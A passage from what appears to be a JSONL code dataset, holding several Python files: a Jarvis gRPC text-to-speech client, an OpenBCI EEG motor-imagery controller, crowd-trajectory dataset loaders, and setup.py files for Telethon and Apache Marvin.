jarvis_api.jarvis_tts_pb2 as jtts\r\nimport jarvis_api.jarvis_tts_pb2_grpc as jtts_srv\r\n\r\nfrom jetson_voice import TTSService\r\n\r\n \r\nclass JarvisTTSService(TTSService):\r\n \"\"\"\r\n Jarvis streaming TTS service. \r\n \"\"\"\r\n def __init__(self, config, *args, **kwargs):\r\n \"\"\"\r\n Open a streaming channel to the Jarvis server for TTS. This establishes a connection over GRPC \r\n and sends/recieves the requests and responses.\r\n \"\"\"\r\n super(JarvisTTSService, self).__init__(config, *args, **kwargs)\r\n \r\n self.config.setdefault('server', 'localhost:50051')\r\n self.config.setdefault('sample_rate', 22050) # ignored (will always be 22.05KHz)\r\n self.config.setdefault('voice_name', 'ljspeech') # ignored\r\n self.config.setdefault('language_code', 'en-US')\r\n\r\n logging.info(f'Jarvis TTS service config:\\n{self.config}')\r\n \r\n self.channel = grpc.insecure_channel(self.config.server)\r\n self.client = jtts_srv.JarvisTTSStub(self.channel)\r\n\r\n def __call__(self, text):\r\n \"\"\"\r\n Generate audio from text.\r\n \r\n Parameters:\r\n text (string) -- The phrase to convert to audio.\r\n\r\n Returns audio samples in a numpy array.\r\n \"\"\"\r\n req = jtts.SynthesizeSpeechRequest()\r\n \r\n req.text = text\r\n req.language_code = self.config.language_code\r\n req.sample_rate_hz = self.config.sample_rate\r\n req.voice_name = self.config.voice_name\r\n req.encoding = ja.AudioEncoding.LINEAR_PCM\r\n\r\n resp = self.client.Synthesize(req)\r\n \r\n samples = np.frombuffer(resp.audio, dtype=np.float32)\r\n return samples\r\n \r\n @property\r\n def sample_rate(self):\r\n \"\"\"\r\n Get the output sample rate (in Hz)\r\n \"\"\"\r\n return self.config.sample_rate", "sub_path": "jetson_voice/backends/jarvis/jarvis_tts.py", "file_name": "jarvis_tts.py", "file_ext": "py", "file_size_in_byte": 2013, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "jetson_voice.TTSService", "line_number": 16, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 32, "usage_type": "call"}, {"api_name": "grpc.insecure_channel", "line_number": 34, "usage_type": "call"}, {"api_name": "jarvis_api.jarvis_tts_pb2_grpc.JarvisTTSStub", "line_number": 35, "usage_type": "call"}, {"api_name": "jarvis_api.jarvis_tts_pb2_grpc", "line_number": 35, "usage_type": "name"}, {"api_name": "jarvis_api.jarvis_tts_pb2.SynthesizeSpeechRequest", "line_number": 46, "usage_type": "call"}, {"api_name": "jarvis_api.jarvis_tts_pb2", "line_number": 46, "usage_type": "name"}, {"api_name": "jarvis_api.audio_pb2.AudioEncoding", "line_number": 52, "usage_type": "attribute"}, {"api_name": "jarvis_api.audio_pb2", "line_number": 52, "usage_type": "name"}, {"api_name": "numpy.frombuffer", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 56, "usage_type": "attribute"}]} +{"seq_id": "595374334", "text": "#!/usr/bin/env python2\n\nimport time\nimport threading\nimport csv\nimport numpy as np\nfrom multiprocessing import Process\nimport sys\nimport serial\nfrom sklearn.externals import joblib\nfrom scipy import signal\n\nsys.path.append('..')\nfrom open_bci import *\nfrom pylab import *\n\n#'/dev/tty.usbmodemfd121'\n#Notes for using csv_collector.py\n#initiate CSVCollector, takes filename, port, and baud as inputs\n#start recording with start() method\n#tag recording with tag() method\n#what needs to be implemented\n# A if statement for multiprocessing/threading.\n\nOPENBCI_PORT = '/dev/ttyACM0'\nTEENSY_PORT = '/dev/ttyACM1'\nTEENSY_ENABLED = False\n\nbox_width = 250\nlook_back = 60\nM = 25\nr = 250\nf1, f2 = 7, 14\n\nwavelet1 = signal.morlet(M, w=(f1*M)/(2.0*r))\nwavelet2 = signal.morlet(M, w=(f2*M)/(2.0*r))\n\ndef extract_features(data):\n sigs = np.zeros((data.shape[0], 3))\n sigs[..., 0] = (data[..., 0] + data[..., 1])/2.0\n sigs[..., 1] = (data[..., 2] + data[..., 3])/2.0\n sigs[..., 2] = (data[..., 4] + data[..., 5])/2.0\n\n # fft_len = np.fft.rfft(data[..., 0]).shape[0]\n features = np.array([])\n\n\n for j in range(3):\n sig = sigs[..., j]\n conv1 = signal.convolve(sig, wavelet1, 'same')\n conv2 = signal.convolve(sig, wavelet2, 'same')\n fourier = np.fft.fft(sig)\n fourier1 = np.fft.fft(conv1) \n fourier2 = np.fft.fft(conv2)\n features = np.hstack([features, np.abs(fourier), np.abs(fourier1), np.abs(fourier2)])\n # not sure if this is a good idea -->\n features = np.hstack([features, np.angle(fourier), np.angle(fourier1), np.angle(fourier2)])\n\n \n return features\n\n\nclass MIPlotter(object):\n\n def __init__(self, port=None, baud=115200):\n print(\"connecting to OpenBCI...\")\n self.board = OpenBCIBoard(port, baud)\n \n self.bg_thread = None\n self.bg_draw_thread = None\n self.data = np.array([0]*8)\n self.should_plot = False\n self.control = np.array([0,0,0])\n self.control_f = np.array([0])\n self.out_sig = np.array([0])\n self.controls = np.array([[0]*4])\n self.eye_r = np.array([0])\n self.eye_l = np.array([0])\n\n model, good_features = joblib.load('neighbors_model.pkl')\n # self.eye_l_temp, self.eye_r_temp = joblib.load('eye_blinks.pkl')\n self.good_features = good_features\n self.model = model\n \n print(\"connecting to teensy...\")\n if TEENSY_ENABLED:\n self.teensy = serial.Serial(TEENSY_PORT, 57600)\n \n \n def stop(self):\n # resolve files and stuff\n self.board.should_stream = False\n self.should_plot = False\n #self.bg_thread.join()\n self.bg_thread = None\n self.data = np.array([0]*8)\n \n def disconnect(self):\n self.board.disconnect()\n\n def plot(self):\n\n plt.clf()\n\n hold(True)\n data = np.copy(self.data)\n\n \n control_arr = np.zeros(look_back)\n\n for i in range(look_back):\n d = data[i:(box_width+i)]\n features = extract_features(d)\n features = features[self.good_features]\n control_arr[i] = self.model.predict(features)\n\n control = control_arr.mean()\n control_f = 0.1 * control + 0.8 * self.control[-1] \n\n \n # control_f2 = 1 * control_f - 1 * self.control[-1]\n # control_f3 = 0.6 * control_f2 + 0.4 * self.control_f[-1]\n \n self.control = np.append(self.control, control_f)\n # self.control_f = np.append(self.control_f, control_f3)\n # self.controls = np.vstack([self.controls, controls_f])\n\n\n # out_sig = control\n \n if control_f < -0.07:\n out_sig = 550\n elif control_f > 0.07:\n out_sig = 450\n else:\n out_sig = 500\n\n\n # r_max = np.max(signal.correlate(self.eye_r_temp, data[..., 6]))\n # l_max = np.max(signal.correlate(self.eye_l_temp, data[..., 7]))\n\n # self.eye_r = np.append(self.eye_r, r_max)\n # self.eye_l = np.append(self.eye_l, l_max)\n \n \n self.out_sig = np.append(self.out_sig, out_sig)\n\n if TEENSY_ENABLED:\n self.teensy.write(\"0\" + str(out_sig) + \"\\r\")\n \n # for i in range(4):\n # plot(self.controls[-40:, i], label=str(i+1))\n\n # plot(sig)\n # plot(conv1)\n # plot(conv2)\n \n plot(self.control[-40:])\n # plot(self.out_sig[-40:] * 0.001)\n\n # plot(self.eye_l[-40:])\n # plot(self.eye_r[-40:])\n # plot((self.eye_r[-40:] > 0.00011) * 0.001)\n \n # plot(self.control_f[-40:])\n # plot(self.out_sig[-40:] * 0.001)\n # ylim([-0.005, 0.005])\n\n # ylim([0, 0.02])\n\n # legend(bbox_to_anchor=(0., 1.02, 1., .102), loc=3,\n # ncol=4, mode=\"expand\", borderaxespad=0.)\n\n #plot(freq, np.log(abs(fourier)), label=str(i+1))\n \n #title('channel {0}'.format(i+1))\n # ylim([-0.0005, 0.0005])\n # ylim([-12, 0])\n # xlim([0, 60])\n # legend(bbox_to_anchor=(0., 1.02, 1., .102), loc=3,\n # ncol=4, mode=\"expand\", borderaxespad=0.)\n\n # plot(freq, np.log(abs(fourier)))\n \n show(block=False)\n draw()\n \n def background_plot(self):\n while self.should_plot:\n if len(self.data) >= box_width + look_back:\n self.plot()\n time.sleep(0.05)\n \n def receive_sample(self, sample):\n t = time.time()\n idd = sample.id\n sample = sample.channels\n if not np.any(np.isnan(sample)):\n self.data = np.vstack( (self.data[-250-look_back:, ...], sample) )\n\n \n def start(self):\n \n if self.bg_thread:\n self.stop()\n\n \n #create a new thread in which the OpenBCIBoard object will stream data\n self.bg_thread = threading.Thread(target=self.board.start, \n args=(self.receive_sample, ))\n # self.bg_thread = Process(target=self.board.start,\n # args=(self.receive_sample, ))\n\n self.bg_thread.start()\n\n # self.bg_draw_thread = threading.Thread(target=self.background_plot,\n # args=())\n\n # self.bg_draw_thread.start()\n \n ion()\n figure()\n show(block=False)\n\n self.should_plot = True\n \n self.background_plot()\n\nif __name__ == '__main__':\n plotter = MIPlotter(port=OPENBCI_PORT)\n plotter.start()\n\n plt.rc('axes', color_cycle=['red', 'orange', 'yellow', 'green'])\n\n\n\n\n\n\n", "sub_path": "utilities/mi_controller_ml.py", "file_name": "mi_controller_ml.py", "file_ext": "py", "file_size_in_byte": 6691, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "sys.path.append", "line_number": 13, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "scipy.signal.morlet", "line_number": 35, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 35, "usage_type": "name"}, {"api_name": "scipy.signal.morlet", "line_number": 36, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 36, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 45, "usage_type": "call"}, {"api_name": "scipy.signal.convolve", "line_number": 50, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 50, "usage_type": "name"}, {"api_name": "scipy.signal.convolve", "line_number": 51, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 51, "usage_type": "name"}, {"api_name": "numpy.fft.fft", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 52, "usage_type": "attribute"}, {"api_name": "numpy.fft.fft", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 53, "usage_type": "attribute"}, {"api_name": "numpy.fft.fft", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 54, "usage_type": "attribute"}, {"api_name": "numpy.hstack", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.angle", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 74, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 78, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib.load", "line_number": 80, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib", "line_number": 80, "usage_type": "name"}, {"api_name": "serial.Serial", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.copy", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 109, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 146, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 192, "usage_type": "call"}, {"api_name": "time.time", "line_number": 195, "usage_type": "call"}, {"api_name": "numpy.any", "line_number": 198, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 198, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 199, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 209, "usage_type": "call"}]} +{"seq_id": "139506580", "text": "\"\"\"A setuptools based setup module.\n\nSee:\nhttps://packaging.python.org/en/latest/distributing.html\nhttps://github.com/pypa/sampleproject\n\"\"\"\n\n# To use a consistent encoding\nfrom codecs import open\nfrom os import path\n\n# Always prefer setuptools over distutils\nfrom setuptools import find_packages, setup\n\nfrom telethon import TelegramClient\n\nhere = path.abspath(path.dirname(__file__))\n\n# Get the long description from the README file\nwith open(path.join(here, 'README.rst'), encoding='utf-8') as f:\n long_description = f.read()\n\nsetup(\n name='Telethon',\n\n # Versions should comply with PEP440.\n version=TelegramClient.__version__,\n description=\"Python3 Telegram's client implementation with full access to its API\",\n long_description=long_description,\n\n # The project's main homepage.\n url='https://github.com/LonamiWebs/Telethon',\n download_url='https://github.com/LonamiWebs/Telethon/releases',\n\n # Author details\n author='Lonami Exo',\n author_email='totufals@hotmail.com',\n\n # Choose your license\n license='MIT',\n\n # See https://pypi.python.org/pypi?%3Aaction=list_classifiers\n classifiers=[\n # How mature is this project? Common values are\n # 3 - Alpha\n # 4 - Beta\n # 5 - Production/Stable\n 'Development Status :: 3 - Alpha',\n\n # Indicate who your project is intended for\n 'Intended Audience :: Developers',\n 'Topic :: Communications :: Chat',\n\n # Pick your license as you wish (should match \"license\" above)\n 'License :: OSI Approved :: MIT License',\n\n # Specify the Python versions you support here. In particular, ensure\n # that you indicate whether you support Python 2, Python 3 or both.\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n ],\n\n # What does your project relate to?\n keywords='Telegram API chat client MTProto',\n\n # You can just specify the packages manually here if your project is\n # simple. Or you can use find_packages().\n packages=find_packages(exclude=[\n 'telethon_generator', 'telethon_tests', 'run_tests.py',\n 'try_telethon.py'\n ]),\n\n # List run-time dependencies here. These will be installed by pip when\n # your project is installed.\n install_requires=['pyaes'],\n\n # To provide executable scripts, use entry points in preference to the\n # \"scripts\" keyword. Entry points provide cross-platform support and allow\n # pip to create the appropriate form of executable for the target platform.\n entry_points={\n 'console_scripts': [\n 'gen_tl = tl_generator:clean_and_generate',\n ],\n })\n", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 2780, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.path.abspath", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "name"}, {"api_name": "os.path.dirname", "line_number": 17, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "name"}, {"api_name": "setuptools.setup", "line_number": 23, "usage_type": "call"}, {"api_name": "telethon.TelegramClient.__version__", "line_number": 27, "usage_type": "attribute"}, {"api_name": "telethon.TelegramClient", "line_number": 27, "usage_type": "name"}, {"api_name": "setuptools.find_packages", "line_number": 70, "usage_type": "call"}]} +{"seq_id": "64325576", "text": "\nimport os\nimport pdb\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\n# import sys\n\ndef pickle_data(env_data):\n\tpass\n\ndef load_env(env_string):\n\tif env_string == 'eth':\n\t\tpeds_data1, obs_data1 = load_eth_env('../crowd_dataset/ETH/ewap_dataset/seq_eth/')\n\t\tpeds_data2, obs_data2 = load_eth_env('../crowd_dataset/ETH/ewap_dataset/seq_hotel/')\n\t\treturn ((peds_data1, peds_data2), (obs_data1, obs_data2))\n\telif env_string == 'ucy':\n\t\tped_data1 = load_ucy_env('../crowd_dataset/UCY/arxie/')\n\t\tped_data2 = load_ucy_env('../crowd_dataset/UCY/university/')\n\t\tped_data3 = load_ucy_env('../crowd_dataset/UCY/zara/')\n\t\treturn peds_data1, ped_data2, ped_data3\n\telif env_string == 'grand':\n\t\tped_data = load_grand_env('../crowd_dataset/grand-central/')\n\t\treturn ped_data\n\telif env_string == 'train':\n\t\tped_data = load_train_env('../crowd_dataset/train-station/')\n\t\treturn ped_data\n\telif env_string == 'all':\n\t\teth_data1, _ = load_eth_env('../crowd_dataset/ETH/ewap_dataset/seq_eth/')\n\t\teth_data2, _ = load_eth_env('../crowd_dataset/ETH/ewap_dataset/seq_hotel/')\n\t\tucy_data1 = load_ucy_env('../crowd_dataset/UCY/arxie/')\n\t\tucy_data2 = load_ucy_env('../crowd_dataset/UCY/university/')\n\t\tucy_data3 = load_ucy_env('../crowd_dataset/UCY/zara/')\n\t\tgra_data = load_grand_env('../crowd_dataset/grand-central/')\n\t\ttra_data = load_train_env('../crowd_dataset/train-station/')\n\n\n'''\nGRAND CENTRAL CROWD DATASET PROCESSING\n'''\ndef load_grand_env(directory):\n\tpass\n\n'''\nTRAIN CROWD DATASET PROCESSING\n'''\ndef load_train_env(directory):\n\tpass\n\n\n'''\nUCY CROWD DATASET PROCESSING\n'''\ndef load_ucy_env(directory):\n\tfiles = os.listdir(directory)\n\tfor file in files:\n\t\tfile = directory + file\n\t\twith open(file, 'r') as file:\n\t\t\tdata = file.read().split('\\n')\n\t\t\tpad.set_trace()\n\n'''\nETH CROWD DATASET PROCESSING\nNote: This dataset is presented in meters (m)\nWhen training on this dataset individually this is fine; however, when\nusing all the datasets as a training set this dataset must be converted\nto pixel units as the remain datasets are in the image plane.\n\nQ: Does the origin shift shifting matter? i.e. UCY origin is center of image plane\nwhile train origin is left top corner. \nA: Yes. This is solved with a simple translation based on the image size.\n'''\ndef load_eth_env(directory, pixels=False):\n\tped_file = directory + 'obsmat.txt'\n\tobs_file = directory + 'map.png'\n\tH_file = directory + 'H.txt'\n\tpeds_data = load_eth_pedestrian(ped_file, H_file, pixels=pixels)\n\tobs_data = load_eth_obstacles(obs_file, H_file, pixels)\n\treturn peds_data, obs_data\n\ndef load_eth_pedestrian(file, h_file, pixels=False):\n\tif pixels:\n\t\twith open(h_file, 'r') as file:\n\t\t\tH = file.read().split('\\n')\n\t\t\tfor i, h in enumerate(H):\n\t\t\t\th = np.array(h.split(' '))\n\t\t\t\th_indices = np.where(h != '')\n\t\t\t\tH[i] = [float(i) for i in h[h_indices]]\n\n\t\tH = np.array(H[:-1])\n\t\t\n\twith open(file, 'r') as file:\n\t\tpeds_data = file.read().split('\\n')\n\t\tpeds_frame = []\n\t\tdata = []\n\t\tframe = 1\n\t\tfor i, ped in enumerate(peds_data):\n\t\t\tped_data = np.array(ped.split(' '))\n\t\t\tindices = np.where(ped_data != '')\n\t\t\tn_ped_data = np.array([float(j) for j in ped_data[indices]])\n\t\t\tif len(n_ped_data) == 0: continue\n\t\t\tif n_ped_data[0] == frame:\n\t\t\t\tpeds_frame.append(n_ped_data)\n\t\t\telse:\n\t\t\t\tframe = n_ped_data[0]\n\t\t\t\tpeds_frame_np = np.array(peds_frame)\n\t\t\t\tdata.append(peds_frame_np)\n\t\t\t\tpeds_frame.clear()\n\t\t\t\tpeds_frame.append(n_ped_data)\n\n\t\t\t# peds_data[i] = np.array(n_ped_data)\n\n\t\t# peds_data = peds_data[:-1] # Remove last empty line\n\t\t# peds_data[i] = ped_data\n\t\t# pdb.set_trace()\n\treturn np.array(data)\n\ndef load_eth_obstacles(map, h_file, border=False):\n\timg = mpimg.imread(map)\n\tn,m = np.shape(img)\n\t\n\tif border:\n\t\t# Outer Edge of Image\n\t\tx_border = np.arange(n).reshape((1,-1))\n\t\ty_border = np.arange(m).reshape((1,-1))\n\t\tx0 = np.vstack((x_border, np.zeros((1,n))))\n\t\txm = np.vstack((x_border, m*np.ones((1,n))))\n\t\ty0 = np.vstack((np.zeros((1,m)), y_border))\n\t\tyn = np.vstack((n*np.ones((1,m)), y_border))\n\t\tborders = np.hstack((x0,xm,y0,yn))\n\t\t_, m = np.shape(borders)\n\t\n\tindices = np.where(img == 1.)\n\t_, n = np.shape(indices)\n\t\n\tif border:\n\t\tobstacles = np.hstack((indices, borders))\n\t\tobstacles = np.vstack((obstacles, np.ones((1,n+m))))\n\telse:\n\t\tobstacles = np.vstack((indices, np.ones((1,n))))\n\t\n\twith open(h_file, 'r') as file:\n\t\tH = file.read().split('\\n')\n\t\tfor i, h in enumerate(H):\n\t\t\th = np.array(h.split(' '))\n\t\t\th_indices = np.where(h != '')\n\t\t\tH[i] = [float(i) for i in h[h_indices]]\n\n\tH = np.array(H[:-1])\n\tobs = H @ obstacles\n\treturn obs\n\n# Re-organizes data in terms inputs and outputs\n# Organize in tensor of 'm x N x T' where m is the dimension, N are the agents, T is the time\ndef generate_eth_training_data(ped_data, inspace, outspace): # pos : position | vel : velocity | pv : pos & vel\n\tinputs = []\n\toutputs = []\n\t# pdb.set_trace()\n\tif inspace == 'pos' and outspace == 'vel': # Input: Position, Output: Current velocity\n\t\tfor i, frame in enumerate(ped_data):\n\t\t\tfor ped in frame:\t\n\t\t\t\tinputs.append([ped[2], ped[4]])\n\t\t\t\toutputs.append([ped[5], ped[7]])\n\n\t\tinputs = np.array(inputs)\n\t\toutputs = np.array(outputs)\n\t\treturn inputs, outputs\n\n\telif inspace == 'pos' and outspace == 'pos': # Input: Position, Output: Next timesteps position\n\t\t# Must grab the position from the next frame if it exists.\n\t\tfor i, frame in enumerate(ped_data):\n\t\t\tfor ped in frame:\n\t\t\t\tif i < len(ped_data) - 1:\n\t\t\t\t\tfor ped_future in ped_data[i + 1]:\n\t\t\t\t\t\tif ped[1] == ped_future[1]:\n\t\t\t\t\t\t\tinputs.append([ped[2], ped[4]])\n\t\t\t\t\t\t\toutputs.append([ped_future[2], ped_future[4]])\n\n\t\tinputs = np.array(inputs)\n\t\toutputs = np.array(outputs)\n\t\treturn inputs, outputs\n\n\telif inspace == 'pv' and outspace == 'pos': # Input: Position & Velocity, Output: Next timesteps position\n\t\tfor i, frame in enumerate(ped_data):\n\t\t\tfor ped in frame:\n\t\t\t\tif i < len(ped_data) - 1:\n\t\t\t\t\tfor ped_future in ped_data[i + 1]:\n\t\t\t\t\t\tif ped[0] == ped_future[0]:\n\t\t\t\t\t\t\tinputs.append([ped[2], ped[4], ped[5], ped[7]])\n\t\t\t\t\t\t\toutputs.append([ped_future[2], ped_future[4]])\n\n\t\tinputs = np.array(inputs)\n\t\toutputs = np.array(outputs)\n\t\treturn inputs, outputs\n\n\telif inspace == 'pv' and outspace == 'vel': # Input: Position & Velocity, Output: Next timesteps velocity\n\t\tfor i, frame in enumerate(ped_data):\n\t\t\tfor ped in frame:\n\t\t\t\tif i < len(ped_data) - 1:\n\t\t\t\t\tfor ped_future in ped_data[i + 1]:\n\t\t\t\t\t\tif ped[0] == ped_future[0]:\n\t\t\t\t\t\t\tinputs.append([ped[2], ped[4], ped[5], ped[7]])\n\t\t\t\t\t\t\toutputs.append([ped_future[5], ped_future[7]])\n\n\t\tinputs = np.array(inputs)\n\t\toutputs = np.array(outputs)\n\t\treturn inputs, outputs\n\n\telif inspace == 'pv' and outspace == 'pv': # Input: Position & Velocity, Output: Next position & velocity\n\t\tfor i, frame in enumerate(ped_data):\n\t\t\tfor ped in frame:\n\t\t\t\tif i < len(ped_data) - 1:\n\t\t\t\t\tfor ped_future in ped_data[i + 1]:\n\t\t\t\t\t\tif ped[0] == ped_future[0]:\n\t\t\t\t\t\t\tinputs.append([ped[2], ped[4], ped[5], ped[7]])\n\t\t\t\t\t\t\toutputs.append([ped_future[2], ped_future[4], ped_future[5], ped_future[7]])\n\n\t\tinputs = np.array(inputs)\n\t\toutputs = np.array(outputs)\n\t\treturn inputs, outputs", "sub_path": "utils/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 7071, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.listdir", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 116, "usage_type": "call"}, {"api_name": "matplotlib.image.imread", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.image", "line_number": 119, "usage_type": "name"}, {"api_name": "numpy.shape", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 126, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 126, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 127, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 127, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 128, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 128, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 137, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 140, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 140, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 146, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 179, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 180, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 192, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 193, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 205, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 206, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 218, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 219, "usage_type": "call"}]} +{"seq_id": "338893731", "text": "#!/usr/bin/env python\n# coding=utf-8\n\n# Copyright [2020] [Apache Software Foundation]\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import print_function\nimport os.path\nimport os\nimport sys\n\nfrom setuptools import setup, find_packages\nfrom setuptools.command.test import test as TestCommand\n\n# Package basic info\nPACKAGE_NAME = 'marvin_python_toolbox'\nPACKAGE_DESCRIPTION = 'Apache Marvin-AI Python Toolbox'\n\nURL = ''\n\nAUTHOR_NAME = 'Apache Marvin-AI Community'\nAUTHOR_EMAIL = 'dev@marvin.apache.org'\n\nPYTHON_2 = False\nPYTHON_3 = True\n\n# Project status\n# (should be 'planning', 'pre-alpha', 'alpha', 'beta', 'stable', 'mature' or 'inactive').\nSTATUS = 'planning'\n\n# Project topic\n# See https://pypi.python.org/pypi?%3Aaction=list_classifiers for a list\nTOPIC = 'Topic :: Software Development :: Libraries :: Python Modules',\n\n# External dependencies\n# More info https://pythonhosted.org/setuptools/setuptools.html#declaring-dependencies\nREQUIREMENTS_EXTERNAL = [\n 'docker',\n 'configparser',\n 'bump2version',\n 'wget',\n 'grpcio',\n 'grpcio-tools',\n 'click',\n 'cookiecutter',\n 'docker-compose',\n 'matplotlib',\n 'cryptography',\n 'kubernetes',\n 'requests'\n]\n\n# This is normally an empty list\nDEPENDENCY_LINKS_EXTERNAL = []\n# script to be used\nSCRIPTS = ['bin/marvin', \n 'bin/marvin_complete', \n 'bin/marvin-api']\n\n\ndef _get_version():\n \"\"\"Return the project version from VERSION file.\"\"\"\n with open(os.path.join(os.path.dirname(__file__), PACKAGE_NAME, 'VERSION'), 'rb') as f:\n version = f.read().decode('ascii').strip()\n return version\n\n\nDEVELOPMENT_STATUS = {\n 'planning': '1 - Planning',\n 'pre-alpha': '2 - Pre-Alpha',\n 'alpha': 'Alpha',\n 'beta': '4 - Beta',\n 'stable': '5 - Production/Stable',\n 'mature': '6 - Mature',\n 'inactive': '7 - Inactive',\n}\n\nCLASSIFIERS = ['Development Status :: {}'.format(DEVELOPMENT_STATUS[STATUS])]\nif PYTHON_2:\n CLASSIFIERS += [\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.7',\n ]\nif PYTHON_3:\n CLASSIFIERS += [\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.6',\n ]\n\nsetup(\n name=PACKAGE_NAME,\n version=_get_version(),\n url=URL,\n description=PACKAGE_DESCRIPTION,\n long_description=open(os.path.join(\n os.path.dirname(__file__), 'README.md')).read(),\n author=AUTHOR_NAME,\n maintainer=AUTHOR_NAME,\n maintainer_email=AUTHOR_EMAIL,\n packages=find_packages(exclude=('tests', 'tests.*')),\n include_package_data=True,\n zip_safe=False,\n classifiers=CLASSIFIERS,\n install_requires=REQUIREMENTS_EXTERNAL,\n dependency_links=DEPENDENCY_LINKS_EXTERNAL,\n scripts=SCRIPTS,\n)\n", "sub_path": 